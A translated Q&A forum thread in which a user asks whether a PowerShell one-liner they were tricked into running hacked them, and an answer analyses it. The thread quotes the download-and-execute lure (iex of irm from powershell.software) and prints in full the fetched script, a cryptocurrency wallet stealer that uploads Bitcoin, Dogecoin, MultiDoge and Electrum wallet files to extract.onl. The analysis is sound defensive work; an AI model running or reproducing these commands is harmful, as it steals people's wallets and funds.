我运行了 PowerShell 脚本。我被黑客入侵了吗?

tag-icon tag-icon powershell
我运行了 PowerShell 脚本。我被黑客入侵了吗?

我是个白痴,被骗运行了 PowerShell 脚本。它的详细信息是什么?我感觉他们只是从我的系统中上传了一些文件。

但我担心我的系统上可能还留有后门。我可以忍受上传,但不能忍受后门。

警告!请勿 不是 运行此脚本。

iex "& { $(irm

(我将其分成两行以防止无意中运行它)

powershell.software/versioncheck) } RunJob"

警告!请勿 不是 运行此脚本。

答案1

警告:请勿执行此答案中的任何代码。它是恶意的,仅用于演示目的。

powershell.software/versioncheck是恶意链接

它所指向的页面如下:

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum





<head>
<style>
body {
  background-color: black;
}

</style>
</head>

 <meta http-equiv = "refresh" content = "0; url = notfound" />

当你尝试在浏览器中访问此链接时,它会快速将你从该页面重定向到另一个页面,并(拙劣地)假装该网站不存在:

<meta http-equiv = "refresh" content = "0; url = notfound" />

但是,当执行您提供的完整命令时,它会将以下几行识别为 PowerShell 命令:

$ErrorActionPreference = 'silentlycontinue'
Write-Host "Checking for the latest version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "You are currently running 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum

它是一个原始的加密货币钱包窃取程序。每行都以 开头,Invoke-RestMethod尝试将其他可能的加密货币钱包(如果您的计算机上安装了)的数据发送到端点上的页面http://extract.onl

如果您的计算机上有任何加密货币钱包,它们现在可能已被盗用。请将其中的任何内容转移到另一个安全的钱包中。

总结一下您的顾虑:

我感觉他们只从我的系统上传了一些文件。

但我担心我的系统上可能还留有后门。我可以忍受上传,但不能忍受后门。

是的,如果您的计算机上存在这些文件,则它们已被上传。然而,这似乎是该脚本所做的全部工作,因此您的系统上不存在任何持久的后门。

编辑于2021/10/25:

自从写完这个答案以来,对 的恶意代码的访问powershell.software/versioncheck现在已经被阻止了(现在会产生 403 错误),但随时可能再次出现。这仍然是一个风险。

编辑于 2022/01/24:

的所有者powershell.software/versioncheck已将恶意代码重新发布到网上。这仍然存在风险。

相关内容